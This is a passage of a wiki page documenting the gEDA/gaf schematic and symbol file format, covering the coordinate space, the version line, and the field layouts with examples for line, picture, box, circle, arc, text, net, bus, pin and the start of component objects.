href="http://www.gnu.org/copyleft/fdl.html" class="urlextern" title="http://www.gnu.org/copyleft/fdl.html" rel="nofollow">GFDL</a> </p> <p> December 31st, 2003 </p> </div> <!-- SECTION "gEDA/gaf File Format Document" [1-187] --> <h2><a name="overview" id="overview">Overview</a></h2> <div class="level2"> <p> This file is the official documentation for the file formats in gEDA/gaf (gschem And Friends). The primary file format used in gEDA/gaf is the schematic/symbol format. Files which end with .sch or .sym are schematics or symbol files. Until there is another file type in gEDA/gaf, then this document will only cover the symbol/schematic file format.<br/> This file format document is current as of gEDA/gaf version 20040111. This document covers file format version 1 and 2.<br/> Note, this file format and any other file formats associated with gEDA are placed under the General Public License (<acronym title="GNU General Public License">GPL</acronym>) version 2.0. The gEDA/gaf symbol and schematic file format is Copyright (C) 1998-2004 Ales Hvezda. </p> </div> <!-- SECTION "Overview" [188-902] --> <h2><a name="coordinate_space" id="coordinate_space">Coordinate Space</a></h2> <div class="level2"> <p> All coordinates are in mils (1/1000 or an inch). This is an arbitrary decision. Remember in there is no concept of physical lengths/dimensions in schematics and symbols (for schematic capture only).<br/> </p> <ul> <li class="level1"><div class="li"> Origin is in lower left hand corner.</div> </li> <li class="level1"><div class="li"> The size of the coordinate space is unlimited, but it is recommended that all objects stay within (120.0, 90.0) (x, y inches).</div> </li> <li class="level1"><div class="li"> It is generally advisable to have positive x and y coordinates, however, negative coordinates work too, but not recommended.</div> </li> </ul> <p> The following figure shows how the coordinate space is setup: </p> <table class="inline"> <tr> <td><a href="media/geda/coordinatespace.jpg" class="media" target="_blank" title="geda:coordinatespace.jpg"><img src="media/geda/coordinatespace.jpg" class="mediaright" title=":geda:coordinatespace.jpg " alt=":geda:coordinatespace.jpg " /></a></td> </tr> </table> <p> X axis increases going to the right. Y axis increase going up. Coordinate system is landscape and corresponds to a sheet of paper turned on its side. </p> </div> <!-- SECTION "Coordinate Space" [903-1709] --> <h2><a name="filenames" id="filenames">Filenames</a></h2> <div class="level2"> <p> Symbols end in .sym. The only symbol filename convention that is used in gEDA/gaf is that if there are multiple instances of a symbol with the same name (like a 7400), then a -1, -2, -3, &hellip; -N suffix is added to the end of the filename. Example: 7400-1.sym, 7400-2.sym, 7400-3.sym&hellip;<br/> Schematics end in .sch. There used to be a schematic filename convention (adding a -1 .. -N to the end of the basename), but this convention is now obsolete. Schematic filenames can be anything that makes sense to the creator. </p> </div> <!-- SECTION "Filenames" [1710-2246] --> <h2><a name="object_types" id="object_types">Object types</a></h2> <div class="level2"> <p> A schematic/symbol file for gEDA/gaf consists of: </p> <ul> <li class="level1"><div class="li"> A version (v) as the first item in the file. This is required.</div> </li> <li class="level1"><div class="li"> Any number of objects and the correct data. Objects are specified by an “object type”</div> </li> <li class="level1"><div class="li"> Most objects are a single line, however text objects are two lines long.</div> </li> <li class="level1"><div class="li"> No blank lines at the end of the file (these are ignored by the tools)</div> </li> <li class="level1"><div class="li"> For all enumerated types in the gEDA/gaf file formats, the field takes on the numeric value.</div> </li> </ul> <p> The “object type” id is a single letter and this id must start in the first column. The object type id is case sensitive.<br/> The schematic and symbol files share the same file layout. A symbol is nothing more than a collection of primitive objects (lines, boxes, circles, arcs, text, and pins). A schematic is a collection of symbols (components), nets, and buses.<br/> The following sections describe the specifics of each recognized object type. Each section has the name of the object, which file type (sch/sym) the object can appear in, the format of the data, a description of each individual field, details and caveats of the fields, and finally an example with description.<br/> For information on the color index (which is used in practically all objects), see the Color section. </p> </div> <!-- SECTION "Object types" [2247-3519] --> <h3><a name="version" id="version">version</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type version fileformat_version</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>v</td> </tr> <tr> <td>version</td><td>int</td><td>version of gEDA/gaf that wrote this file</td> </tr> <tr> <td>fileformat_version</td><td>int</td><td>gEDA/gaf file format version number</td> </tr> </table> <ul> <li class="level1"><div class="li"> The type is a lower case “v” (as in Victor).</div> </li> <li class="level1"><div class="li"> This object must be in every file used or created by the gEDA/gaf tools.</div> </li> <li class="level1"><div class="li"> The format of the first version field is YYYYMMDD.</div> </li> <li class="level1"><div class="li"> The version number is not an arbitrary timestamp. Do not make up a version number and expect the tools to behave properly.</div> </li> <li class="level1"><div class="li"> The “version of gEDA/gaf that wrote this file” was used in all versions of gEDA/gaf up to 20030921 as the file formats version. This field should no longer be used to determine the file format. It is used for information purposes only now.</div> </li> <li class="level1"><div class="li"> Starting at and after gEDA/gaf version 20031004, the fileformat version field is used to determine the file format version. All file format code should key off of this field.</div> </li> <li class="level1"><div class="li"> fileformat version increases when the file format changes.</div> </li> <li class="level1"><div class="li"> The starting point for fileformat version was 1. The current fileformat is 2.</div> </li> <li class="level1"><div class="li"> fileformat version is just an integer with no minor number.</div> </li> <li class="level1"><div class="li"> Development versions include: 19990601, 19990610, 19990705, 19990829, 19990919, 19991011, 20000220, 20000704, 20001006, 20001217, 20010304, 20010708, 20010722, 20020209, 20020414, 20020527, 20020825, 20021103, 20030223, 20030525, 20030901, 20040111, 20040710, 20041228, 20050313, 20050820, 20060123, 20060824, 20060906, 20061020, 20070216, 20070705, 20070708, 20070818, 20071229, 20080110, 20080127, 20080706, 20081220, 20081221, 20090328, 20090829, 20090830</div> </li> <li class="level1"><div class="li"> Stable versions include: 20070526, 20070626, 20070902, 20071231, 20080127, 20080929, 20081220, 20081231, 20091004, 20100214</div> </li> <li class="level1"><div class="li"> <acronym title="Concurrent Versions System">CVS</acronym> or test versions (should not be used): 20030921, 20031004, 20031019, 20031231, 20050814</div> </li> <li class="level1"><div class="li"> Keep in mind that each of the above listed versions might have had file format variations. This document only covers the last version’s file format.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">v 20040111 1</pre> </div> <!-- SECTION "version" [3520-5597] --> <h3><a name="line" id="line">line</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x1 y1 x2 y2 color width capstyle dashstyle dashlength dashspace</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>L</td> </tr> <tr> <td>x1</td><td>int/mils</td><td>First X coordinate</td> </tr> <tr> <td>y1</td><td>int/mils</td><td>First Y coordinate</td> </tr> <tr> <td>x2</td><td>int/mils</td><td>Second X coordinate</td> </tr> <tr> <td>y2</td><td>int/mils</td><td>Second Y coordinate</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of line</td> </tr> <tr> <td>capstyle</td><td>int</td><td>Line cap style</td> </tr> <tr> <td>dashstyle</td><td>int</td><td>Type of dash style</td> </tr> <tr> <td>dashlength</td><td>int</td><td>Length of dash</td> </tr> <tr> <td>dashspace</td><td>int</td><td>Space inbetween dashes</td> </tr> </table> <ul> <li class="level1"><div class="li"> The capstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> END NONE = 0</div> </li> <li class="level2"><div class="li"> END SQUARE = 1</div> </li> <li class="level2"><div class="li"> END ROUND = 2</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> TYPE SOLID = 0</div> </li> <li class="level2"><div class="li"> TYPE DOTTED = 1</div> </li> <li class="level2"><div class="li"> TYPE DASHED = 2</div> </li> <li class="level2"><div class="li"> TYPE CENTER = 3</div> </li> <li class="level2"><div class="li"> TYPE PHANTOM = 4</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashlength parameter is not used for TYPE SOLID and TYPE DOTTED. This parameter should take on a value of -1 in these cases.</div> </li> <li class="level1"><div class="li"> The dashspace paramater is not used for TYPE SOLID. This parameter should take on a value of -1 in these case.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">L 23000 69000 28000 69000 3 40 0 1 -1 75</pre> <p> A line segment from (23000, 69000) to (28000, 69000) with color index 3, 40 mils thick, no cap, dotted line style, and with a spacing of 75 mils in between each dot. </p> </div> <!-- SECTION "line" [5598-6832] --> <h3><a name="picture" id="picture">picture</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x1 y1 width height angle ratio mirrored embedded<br/> filename<br/> [encoded picture data<br/> encoded picture end]</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>G</td> </tr> <tr> <td>x</td><td>int/mils</td><td>Lower left X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>Lower left Y coordinate</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of the picture</td> </tr> <tr> <td>height</td><td>int/mils</td><td>Height of the picture</td> </tr> <tr> <td>angle</td><td>int/degrees</td><td>Angle of the picture</td> </tr> <tr> <td>mirrored</td><td>char</td><td>Mirrored or normal picture</td> </tr> <tr> <td>embedded</td><td>char</td><td>Embedded or link to the picture file</td> </tr> <tr> <td>filename</td><td>string</td><td>path and filename of a not embedded picture</td> </tr> <tr> <td>encoded picture data</td><td>string</td><td>Serialized picture encoded using base64</td> </tr> <tr> <td>encoded picture end</td><td>string</td><td>A line containing only a dot character</td> </tr> </table> <ul> <li class="level1"><div class="li"> This object is a picture object. The first line contains all the picture parameters, and the second line is the path and filename of the picture. The filename is not used if the picture is embedded.</div> </li> <li class="level1"><div class="li"> The angle of the picture can only take on one of the following values: 0, 90, 180, 270.</div> </li> <li class="level1"><div class="li"> The mirrored field is an enumerated type:</div> <ul> <li class="level2"><div class="li"> NOT MIRRORED = 0</div> </li> <li class="level2"><div class="li"> MIRRORED = 1</div> </li> </ul> </li> <li class="level1"><div class="li"> The embedded field is an enumerated type:</div> <ul> <li class="level2"><div class="li"> NOT EMBEDDED = 0</div> </li> <li class="level2"><div class="li"> EMBEDDED = 1 (not yet supported)</div> </li> </ul> </li> <li class="level1"><div class="li"> The encoded picture and encoded picture end fields are only in the file if the picture is embedded in the schematic:</div> <ul> <li class="level2"><div class="li"> encoded picture data: This is a multiple line field. The picture is serialized and then encoded using base64. This way the encoded data uses only printable characters. This field is the result of these two operations.</div> </li> <li class="level2"><div class="li"> encoded picture end : A line containing only a single dot &#039;.&#039; character marks the end of the encoded picture data.</div> </li> </ul> </li> </ul> <p> Example:<br/> </p> <pre class="code">G 16900 35800 1400 2175 0 6.435331e-01 0 0 ../bitmaps/logo.jpg</pre> <p> A picture object with the lower left corner at (16900, 35800). The width of the image is 1400 mils, and its height is 2175 mils (i.e.: the ratio is 0.6353). The picture rotation is 0 degrees and the picture is not mirrored, neither embedded.<br/> The picture path and filename is showed in the second line.<br/> Example:<br/> </p> <pre class="code">G 16900 35800 1400 2175 0 6.435331e-01 0 1 ../bitmaps/logo.jpg AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB .</pre> <p> A picture object with the lower left corner at (16900, 35800). The width of the image is 1400 mils, and its height is 2175 mils (i.e.: the ratio is 0.6353).<br/> The picture rotation is 0 degrees, it is not mirrored, and it is embedded.<br/> The picture path and filename is showed in the second line. Since this is an embedded picture, the filename and path are not used.<br/> The encoded picture data is only an example (it is not real data). The last line containing a single dot &#039;.&#039; character marks the end of the encoded picture data. </p> </div> <!-- SECTION "picture" [6833-9626] --> <h3><a name="box" id="box">box</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x y width height color width capstyle dashtype dashlength dashspace filltype fillwidth angle1 pitch1 angle2 pitch2</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>B</td> </tr> <tr> <td>x</td><td>int/mils</td><td>Lower left hand X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>Lower left hand Y coordinate</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of the box (x direction)</td> </tr> <tr> <td>height</td><td>int/mils</td><td>Height of the box (y direction)</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of lines</td> </tr> <tr> <td>capstyle</td><td>int/mils</td><td>Line cap style</td> </tr> <tr> <td>dashstyle</td><td>int</td><td>Type of dash style</td> </tr> <tr> <td>dashlength</td><td>int/mils</td><td>Length of dash</td> </tr> <tr> <td>dashspace</td><td>int/mils</td><td>Space inbetween dashes</td> </tr> <tr> <td>filltype</td><td>int</td><td>Type of fill</td> </tr> <tr> <td>fillwidth</td><td>int/mils</td><td>Width of the fill lines</td> </tr> <tr> <td>angle1</td><td>int/degrees</td><td>First angle of fill</td> </tr> <tr> <td>pitch1</td><td>int/mils</td><td>First pitch/spacing of fill</td> </tr> <tr> <td>angle2</td><td>int/degrees</td><td>Second angle of fill</td> </tr> <tr> <td>pitch2</td><td>int/mils</td><td>Second pitch/spacing of fill</td> </tr> </table> <ul> <li class="level1"><div class="li"> The capstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> END NONE = 0</div> </li> <li class="level2"><div class="li"> END SQUARE = 1</div> </li> <li class="level2"><div class="li"> END ROUND = 2</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> TYPE SOLID = 0</div> </li> <li class="level2"><div class="li"> TYPE DOTTED = 1</div> </li> <li class="level2"><div class="li"> TYPE DASHED = 2</div> </li> <li class="level2"><div class="li"> TYPE CENTER = 3</div> </li> <li class="level2"><div class="li"> TYPE PHANTOM = 4</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashlength parameter is not used for TYPE SOLID and TYPE DOTTED. This parameter should take on a value of -1 in these cases.</div> </li> <li class="level1"><div class="li"> The dashspace paramater is not used for TYPE SOLID. This parameter should take on a value of -1 in these case.</div> </li> <li class="level1"><div class="li"> The filltype parameter is an enumerated type:</div> <ul> <li class="level2"><div class="li"> FILLING HOLLOW = 0</div> </li> <li class="level2"><div class="li"> FILLING FILL = 1</div> </li> <li class="level2"><div class="li"> FILLING MESH = 2</div> </li> <li class="level2"><div class="li"> FILLING HATCH = 3</div> </li> <li class="level2"><div class="li"> FILLING VOID = 4 unused</div> </li> </ul> </li> <li class="level1"><div class="li"> If the filltype is 0 (FILLING HOLLOW), then all the fill parameters should take on a value of -1.</div> </li> <li class="level1"><div class="li"> The fill type FILLING FILL is a solid color fill.</div> </li> <li class="level1"><div class="li"> The two pairs of pitch and spacing control the fill or hatch if the fill type is FILLING MESH.</div> </li> <li class="level1"><div class="li"> Only the first pair of pitch and spacing are used if the fill type is FILLING HATCH.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">B 33000 67300 2000 2000 3 60 0 2 75 50 0 -1 -1 -1 -1 -1</pre> <p> A box with the lower left hand corner at (33000, 67300) and a width and height of (2000, 2000), color index 3, line width of 60 mils, no cap, dashed line type, dash length of 75 mils, dash spacing of 50 mils, no fill, rest parameters unset. </p> </div> <!-- SECTION "box" [9627-11833] --> <h3><a name="circle" id="circle">circle</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x y radius color width capstyle dashtype dashlength dashspace filltype fillwidth angle1 pitch1 angle2 pitch2</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>V</td> </tr> <tr> <td>x</td><td>int/mils</td><td>Center X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>Center Y coordinate</td> </tr> <tr> <td>radius</td><td>int/mils</td><td>Radius of the circle</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of circle line</td> </tr> <tr> <td>capstyle</td><td>int/mils</td><td>0 unused</td> </tr> <tr> <td>dashstyle</td><td>int</td><td>Type of dash style</td> </tr> <tr> <td>dashlength</td><td>int/mils</td><td>Length of dash</td> </tr> <tr> <td>dashspace</td><td>int/mils</td><td>Space inbetween dashes</td> </tr> <tr> <td>filltype</td><td>int</td><td>Type of fill</td> </tr> <tr> <td>fillwidth</td><td>int/mils</td><td>Width of the fill lines</td> </tr> <tr> <td>angle1</td><td>int/degrees</td><td>First angle of fill</td> </tr> <tr> <td>pitch1</td><td>int/mils</td><td>First pitch/spacing of fill</td> </tr> <tr> <td>angle2</td><td>int/degrees</td><td>Second angle of fill</td> </tr> <tr> <td>pitch2</td><td>int/mils</td><td>Second pitch/spacing of fill</td> </tr> </table> <ul> <li class="level1"><div class="li"> The dashstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> TYPE SOLID = 0</div> </li> <li class="level2"><div class="li"> TYPE DOTTED = 1</div> </li> <li class="level2"><div class="li"> TYPE DASHED = 2</div> </li> <li class="level2"><div class="li"> TYPE CENTER = 3</div> </li> <li class="level2"><div class="li"> TYPE PHANTOM = 4</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashlength parameter is not used for TYPE SOLID and TYPE DOTTED. This parameter should take on a value of -1 in these cases.</div> </li> <li class="level1"><div class="li"> The dashspace paramater is not used for TYPE SOLID. This parameter should take on a value of -1 in these case.</div> </li> <li class="level1"><div class="li"> The filltype parameter is an enumerated type:</div> <ul> <li class="level2"><div class="li"> FILLING HOLLOW = 0</div> </li> <li class="level2"><div class="li"> FILLING FILL = 1</div> </li> <li class="level2"><div class="li"> FILLING MESH = 2</div> </li> <li class="level2"><div class="li"> FILLING HATCH = 3</div> </li> <li class="level2"><div class="li"> FILLING VOID = 4 unused</div> </li> </ul> </li> <li class="level1"><div class="li"> If the filltype is 0 (FILLING HOLLOW), then all the fill parameters should take on a value of -1.</div> </li> <li class="level1"><div class="li"> The fill type FILLING FILL is a solid color fill.</div> </li> <li class="level1"><div class="li"> The two pairs of pitch and spacing control the fill or hatch if the fill type is FILLING MESH.</div> </li> <li class="level1"><div class="li"> Only the first pair of pitch and spacing are used if the fill type is FILLING HATCH.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">V 38000 67000 900 3 0 0 2 75 50 2 10 20 30 90 50</pre> <p> A circle with the center at (38000, 67000) and a radius of 900 mils, color index 3, line width of 0 mils (smallest size), no cap, dashed line type, dash length of 75 mils, dash spacing of 50 mils, mesh fill, 10 mils thick mesh lines, first mesh line: 20 degrees, with a spacing of 30 mils, second mesh line: 90 degrees, with a spacing of 50 mils. </p> </div> <!-- SECTION "circle" [11834-13959] --> <h3><a name="arc" id="arc">arc</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x y radius startangle sweepangle color width capstyle dashtype dashlength dashspace</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>A</td> </tr> <tr> <td>x</td><td>int/mils</td><td>Center X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>Center Y coordinate</td> </tr> <tr> <td>radius</td><td>int/mils</td><td>Radius of the arc</td> </tr> <tr> <td>startangle</td><td>int/degrees</td><td>Starting angle of the arc</td> </tr> <tr> <td>sweepangle</td><td>int/degrees</td><td>Amount the arc sweeps</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>width</td><td>int/mils</td><td>Width of circle line</td> </tr> <tr> <td>capstyle</td><td>int</td><td>Cap style</td> </tr> <tr> <td>dashstyle</td><td>int</td><td>Type of dash style</td> </tr> <tr> <td>dashlength</td><td>int/mils</td><td>Length of dash</td> </tr> <tr> <td>dashspace</td><td>int/mils</td><td>Space inbetween dashes</td> </tr> </table> <ul> <li class="level1"><div class="li"> The startangle can be negative, but not recommended.</div> </li> <li class="level1"><div class="li"> The sweepangle can be negative, but not recommended.</div> </li> <li class="level1"><div class="li"> The capstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> END NONE = 0</div> </li> <li class="level2"><div class="li"> END SQUARE = 1</div> </li> <li class="level2"><div class="li"> END ROUND = 2</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashstyle is an enumerated type:</div> <ul> <li class="level2"><div class="li"> TYPE SOLID = 0</div> </li> <li class="level2"><div class="li"> TYPE DOTTED = 1</div> </li> <li class="level2"><div class="li"> TYPE DASHED = 2</div> </li> <li class="level2"><div class="li"> TYPE CENTER = 3</div> </li> <li class="level2"><div class="li"> TYPE PHANTOM = 4</div> </li> </ul> </li> <li class="level1"><div class="li"> The dashlength parameter is not used for TYPE SOLID and TYPE DOTTED. This parameter should take on a value of -1 in these cases.</div> </li> <li class="level1"><div class="li"> The dashspace paramater is not used for TYPE SOLID. This parameter should take on a value of -1 in these case.</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">A 30600 75000 2000 0 45 3 0 0 3 75 50</pre> <p> An arc with the center at (30600, 75000) and a radius of 2000 mils, a starting angle of 0, sweeping 45 degrees, color index 3, line width of 0 mils (smallest size), no cap, center line type, dash length of 75 mils, dash spacing of 50 mils. </p> </div> <!-- SECTION "arc" [13960-15476] --> <h3><a name="text" id="text">text</a></h3> <div class="level3"> <p> Valid in: Schematic and Symbol files<br/> <strong><code>type x y color size visibility show_name_value angle alignment num_lines<br/> string line 1<br/> string line 2<br/> string line 3<br/> &hellip;<br/> string line N</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>T</td> </tr> <tr> <td>x</td><td>int/mils</td><td>First X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>First Y coordinate</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>size</td><td>int/points</td><td>Size of text</td> </tr> <tr> <td>visibility</td><td>int</td><td>Visibility of text</td> </tr> <tr> <td>show_name_value</td><td>int</td><td>Attribute visibility control</td> </tr> <tr> <td>angle</td><td>int/degrees</td><td>Angle of the text</td> </tr> <tr> <td>alignment</td><td>int</td><td>Alignment/origin of the text</td> </tr> <tr> <td>num_lines</td><td>int</td><td>Number of lines of text (1 based)</td> </tr> <tr> <td>string line 1 &hellip; N</td><td>string</td><td>The text strings, on a seperate line</td> </tr> </table> <ul> <li class="level1"><div class="li"> This object is a multi line object. The first line contains all the text parameters and the subsequent lines are the text strings.</div> </li> <li class="level1"><div class="li"> There must be exactly num lines of text following the T &hellip; string.</div> </li> <li class="level1"><div class="li"> The maximum length of any single text string is 1024, however there is no limit to the number of text string lines.</div> </li> <li class="level1"><div class="li"> The minimum size is 2 points (1/72 of an inch).</div> </li> <li class="level1"><div class="li"> There is no maximum size.</div> </li> <li class="level1"><div class="li"> The coordinate pair is the origin of the text item.</div> </li> <li class="level1"><div class="li"> The visibility field is an enumerated type:</div> <ul> <li class="level2"><div class="li"> INVISIBLE = 0</div> </li> <li class="level2"><div class="li"> VISIBLE = 1</div> </li> </ul> </li> <li class="level1"><div class="li"> The show_name_value is an enumerated type:</div> <ul> <li class="level2"><div class="li"> SHOW NAME VALUE = 0 (show both name and value of an attribute)</div> </li> <li class="level2"><div class="li"> SHOW VALUE = 1 (show only the value of an attribute)</div> </li> <li class="level2"><div class="li"> SHOW NAME = 2 (show only the name of an attribute)</div> </li> </ul> </li> <li class="level1"><div class="li"> The show_name_value field is only valid if the string is an attribute (string has to be in the form: name=value to be considered an attribute).</div> </li> <li class="level1"><div class="li"> The angle of the text can only take on one of the following values: 0, 90, 180, 270. A value of 270 will always generate upright text.</div> </li> <li class="level1"><div class="li"> The alignment/origin field controls the relative location of the origin.</div> </li> <li class="level1"><div class="li"> The alignment field can take a value from 0 to 8. <br/> The following diagram shows what the values for the alignment field mean:</div> </li> </ul> <p> <a href="media/geda/fileformat_textgraphic.jpg" class="media" target="_blank" title="geda:fileformat_textgraphic.jpg"><img src="media/geda/fileformat_textgraphic.jpg" class="media" alt="" /></a> </p> <ul> <li class="level1"><div class="li"> The num_lines field always starts at 1.<br/> The num_lines field was added starting with file format version 1. Past versions (0 or earlier) only supported single line text objects.</div> </li> <li class="level1"><div class="li"> The text strings of the string line(s) can have overbars if the text is embedded in two overbar markers <strong>“\_”</strong>. A single backslash needs to be written as <strong>“\\”</strong>.</div> </li> </ul> <p> Example1:<br/> </p> <pre class="code">T 16900 35800 3 10 1 0 0 0 1 Text string!</pre> <p> A text object with the origin at (16900, 35800), color index 3, 10 points in size, visible, attribute ags not valid (not an attribute), origin at lower left, not rotated, string: Text string! </p> <p> Example2:<br/> </p> <pre class="code">T 16900 35800 3 10 1 0 0 0 5 Text string line 1 Text string line 2 Text string line 3 Text string line 4 Text string line 5</pre> <p> This is a similar text object as the above example, however here there are five lines of text. </p> <p> Example3:<br/> </p> <pre class="code">T 10000 20000 3 10 1 1 8 90 1 pinlabel=R/\_W\_</pre> <p> A text object with the origin at (10000, 20000), color index 3, 10 points in size, visible, only the value of the attribute is visible, text origin at upper right, the text is rotated by 90 degree, the string: “R/W” has an overbar over the “W”. </p> </div> <!-- SECTION "text" [15477-18631] --> <h3><a name="net" id="net">net</a></h3> <div class="level3"> <p> Valid in: Schematic files ONLY<br/> <strong><code>type x1 y1 x2 y2 color</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>N</td> </tr> <tr> <td>x1</td><td>int/mils</td><td>First X coordinate</td> </tr> <tr> <td>y1</td><td>int/mils</td><td>First Y coordinate</td> </tr> <tr> <td>x2</td><td>int/mils</td><td>Second X coordinate</td> </tr> <tr> <td>y2</td><td>int/mils</td><td>Second Y coordinate</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> </table> <ul> <li class="level1"><div class="li"> Nets can only appear in schematic files.</div> </li> <li class="level1"><div class="li"> You cannot have a zero length net (the tools will throw them away).</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">N 12700 29400 32900 29400 4</pre> <p> A net segment from (12700, 29400) to (32900, 29400) with color index 4. </p> </div> <!-- SECTION "net" [18632-19157] --> <h3><a name="bus" id="bus">bus</a></h3> <div class="level3"> <p> Valid in: Schematic files ONLY<br/> <strong><code>type x1 y1 x2 y2 color ripperdir</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>U</td> </tr> <tr> <td>x1</td><td>int/mils</td><td>First X coordinate</td> </tr> <tr> <td>y1</td><td>int/mils</td><td>First Y coordinate</td> </tr> <tr> <td>x2</td><td>int/mils</td><td>Second X coordinate</td> </tr> <tr> <td>y2</td><td>int/mils</td><td>Second Y coordinate</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>ripperdir</td><td>int</td><td>Direction of bus rippers</td> </tr> </table> <ul> <li class="level1"><div class="li"> The ripperdir field for an brand new bus is 0.</div> </li> <li class="level1"><div class="li"> The ripperdir field takes on a value of 1 or -1 when a net is connected to the bus for the first time. This value indicates the direction of the ripper symbol. The ripper direction is set to the same value for the entire life of the bus object.</div> </li> <li class="level1"><div class="li"> Buses can only appear in schematic files.</div> </li> <li class="level1"><div class="li"> You cannot have a zero length bus (the tools will throw them away).</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">U 27300 37400 27300 35300 3 0</pre> <p> A bus segment from (27300, 37400) to (27300, 35300) with color index 3 and no nets have been connected to this bus segment. </p> </div> <!-- SECTION "bus" [19158-20089] --> <h3><a name="pin" id="pin">pin</a></h3> <div class="level3"> <p> Valid in: Symbol files ONLY<br/> <strong><code>type x1 y1 x2 y2 color pintype whichend</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>P</td> </tr> <tr> <td>x1</td><td>int/mils</td><td>First X coordinate</td> </tr> <tr> <td>y1</td><td>int/mils</td><td>First Y coordinate</td> </tr> <tr> <td>x2</td><td>int/mils</td><td>Second X coordinate</td> </tr> <tr> <td>y2</td><td>int/mils</td><td>Second Y coordinate</td> </tr> <tr> <td>color</td><td>int</td><td>Color index</td> </tr> <tr> <td>pintype</td><td>int</td><td>Type of pin</td> </tr> <tr> <td>whichend</td><td>int</td><td>Specifies the active end</td> </tr> </table> <ul> <li class="level1"><div class="li"> The pintype is an enumerated type:</div> <ul> <li class="level2"><div class="li"> NORMAL <acronym title="Personal Identification Number">PIN</acronym> = 0</div> </li> <li class="level2"><div class="li"> BUS <acronym title="Personal Identification Number">PIN</acronym> = 1 unused</div> </li> </ul> </li> <li class="level1"><div class="li"> The whichend specifies which end point of the pin is the active connection port. Only this end point can have other pins or nets connected to it.</div> </li> <li class="level1"><div class="li"> To make the first end point active, whichend should be 0, else to specify the other end, whichend should be 1.</div> </li> <li class="level1"><div class="li"> Pins can only appear in symbol files.</div> </li> <li class="level1"><div class="li"> You cannot have a zero length pen (the tools will throw them away).</div> </li> </ul> <p> Example:<br/> </p> <pre class="code">P 0 200 200 200 1 0 0</pre> <p> A pin from (0, 200) to (200, 200) with color index 1, a regular pin, and the first point being the active connection end. </p> </div> <!-- SECTION "pin" [20090-21086] --> <h3><a name="component" id="component">component</a></h3> <div class="level3"> <p> Valid in: Schematic files ONLY<br/> <strong><code>type x y selectable angle mirror basename</code></strong> </p> <table class="inline"> <tr> <th>Field</th><th>Type/unit</th><th>Description</th> </tr> <tr> <td>type</td><td>char</td><td>C</td> </tr> <tr> <td>x</td><td>int/mils</td><td>Origin X coordinate</td> </tr> <tr> <td>y</td><td>int/mils</td><td>Origin Y coordinate</td> </tr> <tr> <td>selectable</td><td>int</td><td>Selectable flag</td> </tr> <tr> <td>angle</td><td>int/degrees</td><td>Angle of the component</td> </tr> <tr> <td>mirror</td><td>int</td><td>Mirror around Y axis</td> </tr> <tr> <td>basename</td><td>string</td><td>The 